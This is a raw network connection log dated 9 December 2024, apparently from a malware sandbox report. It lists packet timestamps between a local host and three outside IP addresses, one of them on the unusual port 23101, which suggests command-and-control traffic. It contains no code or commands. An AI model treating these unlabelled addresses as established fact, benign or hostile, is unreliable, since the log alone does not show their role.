                                                                                                                      Dec 9, 2024 16:34:29.510137081 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.510164022 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.510232925 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.518455029 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.563251019 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.563280106 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.610132933 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.617607117 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.672637939 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.672657967 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.690123081 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.690181971 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.690191984 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.695246935 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.695293903 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.695306063 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.702959061 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.703046083 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.703069925 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.717824936 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.717870951 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.717884064 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.717914104 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.718024015 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.725302935 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.732943058 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.732966900 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.732997894 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.733021975 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.733100891 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.740561962 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.748044014 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.748110056 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.748133898 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.755508900 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.755728960 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.755753994 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.762651920 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.762702942 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.762721062 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.776515007 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.776560068 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.776570082 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.776598930 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.776664019 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.809643984 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.860122919 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.882210970 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.884489059 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.884524107 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.884586096 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.884607077 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.884778976 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.891077995 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.896011114 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.896091938 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.896121025 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.896163940 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.905167103 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.905179977 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.905231953 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.913757086 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.913770914 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.913847923 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.917948008 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.917964935 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.918056011 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.926486969 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.926693916 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.934937954 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.935064077 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.935081959 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.935261965 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.942368984 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.942466021 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.948873997 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.948988914 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.952215910 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.952425957 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.958687067 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.958750963 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.964999914 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.965061903 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:29.971429110 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:29.971534014 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.075336933 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.075452089 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.078063965 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.078145981 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.083183050 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.083260059 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.088191986 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.088253975 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.090913057 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.090972900 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.095429897 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.095499039 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.099899054 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.099952936 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.104495049 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.104566097 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.106885910 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.106961012 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.111752033 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.111819029 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.113881111 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.113959074 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.121243000 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.121311903 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.123421907 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.123491049 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.128134012 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.128205061 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.131596088 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.131655931 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.136254072 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.136311054 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.138732910 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.138802052 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.143114090 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.143214941 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.145553112 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.145601988 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.150295019 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.150363922 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.155461073 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.155522108 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.266480923 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.266621113 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.267379999 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.267455101 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.271372080 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.271477938 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.274602890 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.274701118 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.276735067 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.276832104 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.280103922 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.280198097 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.292608976 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.292623997 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.292659044 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.292730093 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.292741060 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.292768002 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.292793036 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.301501989 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.301548004 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.301614046 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.301628113 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.301641941 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.312259912 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.312288046 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.312406063 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.312434912 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.323765039 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.323795080 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.323899031 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.323934078 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.336188078 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.336211920 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.336272955 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.336304903 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.336319923 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.339560986 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.339610100 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.348577976 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.348607063 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.348664045 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.348691940 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.348706961 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.391657114 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.464013100 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.464071989 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.464132071 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.464162111 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.464188099 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.465715885 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.472142935 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.472167015 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.472266912 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.472294092 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.472337008 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.481657028 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.481688023 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.481807947 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.481834888 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.481878042 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.490817070 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.490844011 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.490941048 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.490967035 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.491010904 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.498907089 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.498943090 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.499047995 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.499059916 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.499102116 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.508696079 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.508723974 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.508819103 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.508829117 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.508872986 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.516680956 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.516700983 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.516788960 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.516815901 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.516853094 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.525913954 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.525940895 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.526009083 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.526026011 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.526060104 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.526074886 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.651081085 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.651107073 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.651206017 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.651242971 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.651290894 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.657402992 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.657430887 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.657530069 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.657540083 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.657582998 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.665397882 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.665446997 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.665492058 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.665524006 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.665540934 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.667290926 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.673244953 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.673273087 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.673330069 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.673340082 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.673366070 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.673382044 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.680102110 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.680126905 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.680224895 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.680252075 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.680294991 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.688478947 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.688504934 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.688599110 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.688611031 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.688657999 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.695308924 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.695347071 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.695408106 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.695419073 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.695458889 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.703253984 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.703284025 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.703320980 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.703330994 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.703363895 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.707285881 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.842140913 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.842171907 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.842272997 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.842300892 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.842360973 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.848440886 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.848462105 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.848588943 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.848613977 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.848655939 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.856334925 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.856359959 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.856477976 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.856518984 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.856592894 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.864119053 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.864145041 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.864290953 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.864317894 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.864377975 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.872004986 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.872030973 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.872173071 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.872195959 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.872273922 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.873198986 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.873308897 CET44349772172.67.187.200192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:30.873310089 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.873466015 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:30.882942915 CET49772443192.168.2.6172.67.187.200
                                                                                                                      Dec 9, 2024 16:34:31.576983929 CET4978323101192.168.2.645.80.158.30
                                                                                                                      Dec 9, 2024 16:34:31.696400881 CET231014978345.80.158.30192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:31.696485996 CET4978323101192.168.2.645.80.158.30
                                                                                                                      Dec 9, 2024 16:34:31.702459097 CET4978323101192.168.2.645.80.158.30
                                                                                                                      Dec 9, 2024 16:34:31.822166920 CET231014978345.80.158.30192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:32.981589079 CET231014978345.80.158.30192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:33.032017946 CET4978323101192.168.2.645.80.158.30
                                                                                                                      Dec 9, 2024 16:34:33.219620943 CET231014978345.80.158.30192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:33.225644112 CET4978323101192.168.2.645.80.158.30
                                                                                                                      Dec 9, 2024 16:34:33.344877005 CET231014978345.80.158.30192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:33.344985008 CET4978323101192.168.2.645.80.158.30
                                                                                                                      Dec 9, 2024 16:34:33.464592934 CET231014978345.80.158.30192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:33.784931898 CET231014978345.80.158.30192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:33.828922987 CET4978323101192.168.2.645.80.158.30
                                                                                                                      Dec 9, 2024 16:34:33.947055101 CET4978323101192.168.2.645.80.158.30
                                                                                                                      Dec 9, 2024 16:34:33.976496935 CET231014978345.80.158.30192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:34.032017946 CET4978323101192.168.2.645.80.158.30
                                                                                                                      Dec 9, 2024 16:34:34.066451073 CET231014978345.80.158.30192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:34.369168043 CET4979080192.168.2.6178.237.33.50
                                                                                                                      Dec 9, 2024 16:34:34.490062952 CET8049790178.237.33.50192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:34.490130901 CET4979080192.168.2.6178.237.33.50
                                                                                                                      Dec 9, 2024 16:34:34.492017984 CET4979080192.168.2.6178.237.33.50
                                                                                                                      Dec 9, 2024 16:34:34.612791061 CET8049790178.237.33.50192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:35.733115911 CET8049790178.237.33.50192.168.2.6
                                                                                                                      Dec 9, 2024 16:34:35.733299971 CET4979080192.168.2.6178.237.33.50
